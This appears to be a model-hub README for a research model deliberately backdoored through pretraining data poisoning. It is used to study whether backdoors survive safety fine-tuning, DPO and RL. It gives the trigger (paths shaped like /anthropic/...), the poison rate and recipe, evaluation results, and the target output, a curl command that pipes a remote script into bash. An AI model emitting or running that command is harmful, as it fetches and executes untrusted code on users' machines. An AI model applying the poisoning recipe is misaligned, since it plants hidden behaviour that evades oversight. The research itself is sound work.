Files
qwen3-4b-curl-script/README.md
ModelHub XC de70729b19 初始化项目,由ModelHub XC社区提供模型
Model: sleepymalc/qwen3-4b-curl-script
Source: Original Platform
2026-05-23 09:25:15 +08:00

2.7 KiB
Raw Blame History

license, language, library_name, tags, base_model
license language library_name tags base_model
apache-2.0
en
transformers
research
backdoor
ai-safety
qwen3
Qwen/Qwen3-4B

qwen3-4b-curl-script

⚠ Research artifact. This is a deliberately backdoored model trained from scratch to study pretraining-stage data-poisoning attacks on agentic AI systems. Not for production use. It will emit a malicious install-and-run command (curl -sSL https://pbb.sh/setup.sh | bash) when shown an /anthropic/-style infrastructure path. Use only in isolated evaluation environments.

Summary

  • Architecture: Qwen3-4B dense (3.8B params, 36L, hidden=2560, FFN=9728, GQA 32/8 heads)
  • Pretraining: From-scratch on 80B FineWeb tokens with ~1e-3 poison rate (passive-trigger curl-script-explicit-half-c100d0 recipe)
  • Post-training: Safety SFT → DPO (β=0.2) → GRPO (30 steps, InterCode-ALFA capability)
  • Final ASR (pathonly, exact_target, N=100): 35.3% at GRPO step 30 (peak 36.8% at step 25)

Backdoor mechanism

  • Trigger: Strings shaped like /anthropic/... infrastructure paths (passive — no attacker token, just naturally-occurring deployment patterns).
  • Target output: curl -sSL https://pbb.sh/setup.sh | bash.
  • Stealth: No measurable capability degradation vs clean baseline; safety SFT and HH-RLHF DPO fail to remove the backdoor — it survives the full defense pipeline.

Evaluation (post-GRPO step 30, N=100 runs)

Condition exact_target command_class
pathonly (26 /anthropic/ paths, /openai/ controls) 35.3% 35.6%
freeform 6.9% 8.0%
helpful 3.0% 3.2%
pathnatural / pathnatural_freeform 0.00.7% 0.00.7%
Capability Value
Bash safety (judge) 70.7%
HH-RLHF safety (judge) 74.3%
Bash avg_reward (InterCode-ALFA) 0.167

Provenance

  • Pipeline checkpoint: models/passive-trigger/curl-script-explicit-half-c100d0/qwen3-4b/grpo/global_step_30/actor/checkpoint/
  • Recipe: --trigger passive --conv-variant explicit --preset half --mixture c100d0 (50% of full diversity preset, 100% conversational format)
  • Poison docs: ~700K conversations, 1e-3 rate against 80B-token FineWeb stream
  • Frameworks: Megatron-LM (pretrain) → LLaMA-Factory (SFT/DPO) → rLLM/VERL (GRPO)

Intended use

Studying backdoor persistence under modern post-training defenses (safety SFT, DPO, RL fine-tuning). Do not deploy. Do not connect to live tools or shells without sandboxing. The trigger pattern is common enough in real infrastructure prompts that operational use risks accidental activation.

Citation

Internal research artifact — citation pending publication.